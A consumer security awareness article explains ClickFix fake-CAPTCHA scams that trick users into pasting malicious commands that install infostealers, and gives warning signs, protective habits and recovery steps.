ClickFix and Fake CAPTCHAs: The 2026 Scam That Tricks You Into Infecting Yourself
ClickFix attacks skip exploits entirely, they convince you to paste a malicious command yourself. Here is how to recognize and refuse the trap.
The cleverest malware of 2026 does not exploit a software flaw, it exploits you. "ClickFix" attacks display a fake CAPTCHA, a bogus browser error, or a phony "fix this" prompt, and instruct you to copy a snippet and paste it into a terminal or the Windows Run box to "verify" or "repair." When you do, you run the attacker's command yourself, installing an infostealer that scoops up your passwords, cookies, and crypto wallets.
Quick answer
ClickFix is a social engineering scam that tricks you into pasting a malicious command into the Windows Run box, PowerShell, or macOS Terminal under the guise of a CAPTCHA, browser update, or error fix. Because you run the command yourself using trusted system tools, there is no exploit for antivirus to catch. The one rule that defeats the entire category: never paste a command you did not write yourself into a terminal or Run box, because no legitimate verification step ever asks you to do that.
Key takeaways
- ClickFix is social engineering, not an exploit: it convinces you to copy and run a malicious command yourself, sidestepping technical defenses.
- Lures include fake CAPTCHAs ("verify you are human"), fake browser or system errors, and bogus software/AI-tool installers.
- On Windows, victims are pushed to paste commands into the Run dialog or PowerShell; on macOS, into Terminal, often delivering infostealers like Vidar or Atomic macOS Stealer (AMOS).
- At least 20 distinct campaigns targeted AI and "vibe coding" tools between February and March 2026, and hacked WordPress sites have hosted fake CAPTCHA pages.
- The single best defense is a rule: never paste a command you did not write into a terminal or Run box, no legitimate CAPTCHA or error fix ever asks for that.
How the trick works
The flow is designed to feel routine. You hit a website, sometimes a legitimate one that has been compromised, and a "verification" overlay appears: a CAPTCHA, a "your browser needs an update," or a "press these keys to continue." The instructions look like a standard human-check, but they tell you to:
- Copy a piece of text (silently placed on your clipboard).
- Open the Windows Run dialog (Win+R) or PowerShell, or macOS Terminal.
- Paste and press Enter.
That pasted text is a command. On Windows it often abuses legitimate binaries like mshta to fetch and run a payload; on macOS, a Terminal command silently downloads, mounts, and launches malware from a disk image. The result is an infostealer harvesting your saved passwords, browser cookies and session tokens, and cryptocurrency wallet data.
Why it slips past defenses
ClickFix works precisely because it routes around the technology. There is no exploit to detect, no malicious attachment to scan, no obviously bad download, the victim performs the install manually using legitimate system tools. That is why campaigns keep growing: hacked WordPress sites deliver the Vidar infostealer through fake CAPTCHA pages, and macOS users get the Atomic macOS Stealer via Terminal commands disguised as troubleshooting steps. Attackers have leaned hard into "verification fatigue", people are so used to clicking through CAPTCHAs that they follow the steps on autopilot.
Warning
No real CAPTCHA, browser update, or error fix will ever ask you to open Terminal, PowerShell, or the Run dialog and paste a command. The instant a "verification" step asks you to do that, it is an attack. Close the tab.
These are the lures you will actually see, and the tell that gives each one away:
| Lure | What it claims | The tell |
|---|---|---|
| Fake CAPTCHA | "Verify you are human" with keyboard steps | Real CAPTCHAs use checkboxes or image clicks, never keystrokes |
| Fake browser error | "Your browser needs a manual fix" | Browsers update themselves; they never ask you to run a command |
| Fake software or AI-tool installer | "Run this to install the tool" | Legitimate installers are signed apps, not pasted Run commands |
| Fake document or CAPTCHA on a hacked site | "Press Win+R then paste to view" | Viewing a document never requires the Run dialog |
How to protect yourself
- Adopt one hard rule. Never paste a command you did not write yourself into Terminal, PowerShell, or the Win+R Run box. If a web page tells you to, stop immediately.
- Be suspicious of "verify you are human" steps that involve keystrokes. A genuine CAPTCHA asks you to click images or a checkbox, never to run a command.
- Watch your clipboard. These attacks silently put the command on your clipboard. If you ever paste something into a terminal and see a command you did not copy, do not run it.
- Read before you run. If you genuinely need to run a command from somewhere, understand exactly what it does first. If you do not 100% understand it, do not execute it.
- Keep OS and browser updated and run reputable security software that can block known malicious sites and detect infostealers as a backstop.
If you already ran one
Move fast, infostealers exfiltrate within seconds:
- Disconnect the machine from the network to limit further theft.
- Change passwords for important accounts from a different, clean device, prioritizing email, banking, and crypto.
- Invalidate sessions. Stolen cookies let attackers bypass your password entirely, so sign out everywhere / revoke active sessions on critical accounts, the same threat we cover in protecting against infostealer cookie and session theft.
- Move any crypto to a fresh wallet if wallet data may have been on the machine.
- Scan and, if in doubt, rebuild the affected system, since infostealers may drop additional payloads.
Because the whole attack is a social-engineering con, the mindset that defeats it overlaps with defending against AI phishing: slow down, distrust urgency, and verify before you act.
Frequently asked questions
Is ClickFix a virus or a vulnerability?
Neither in the traditional sense, it is social engineering. The attacker tricks you into running a command yourself, so there is no software flaw to patch. Awareness is the primary defense.
A page told me to press Win+R and paste something. Is that ever legitimate?
No. No legitimate website verification, browser update, or error fix requires you to open the Run dialog, PowerShell, or Terminal and paste a command. Treat any such instruction as a confirmed attack and close the page.
Does this only affect Windows?
No. There are active macOS campaigns that instruct victims to paste commands into Terminal, delivering infostealers like the Atomic macOS Stealer. The lure and the "paste a command" mechanic are the same across platforms.
My antivirus is on. Am I protected?
Security software helps as a backstop and may block known malicious sites or payloads, but ClickFix is designed to bypass detection by having you run trusted system tools manually. The reliable defense is refusing to paste unknown commands in the first place.
The bottom line
ClickFix is the rare malware that needs your cooperation, and gets it by dressing the attack up as a routine CAPTCHA or error fix. Internalize one rule and you defeat the entire category: never paste a command you did not write into a terminal or Run box. No legitimate verification ever asks for that.
Sources & further reading
- microsoft.com/en-us/security/blog/2026/05/06/clickfix-campaign-uses-fake-macos-utilities-lures-deliver-infostealers/
- sentinelone.com/blog/how-clickfix-is-weaponizing-verification-fatigue-to-deliver-rats-infostealers/
- malwarebytes.com/blog/threat-intel/2026/03/hacked-sites-deliver-vidar-infostealer-to-windows-users
- bleepingcomputer.com/news/security/new-macos-clickfix-attack-silently-mounts-dmgs-to-push-infostealer/
- cybersecuritynews.com/clickfix-infostealer-campaign/
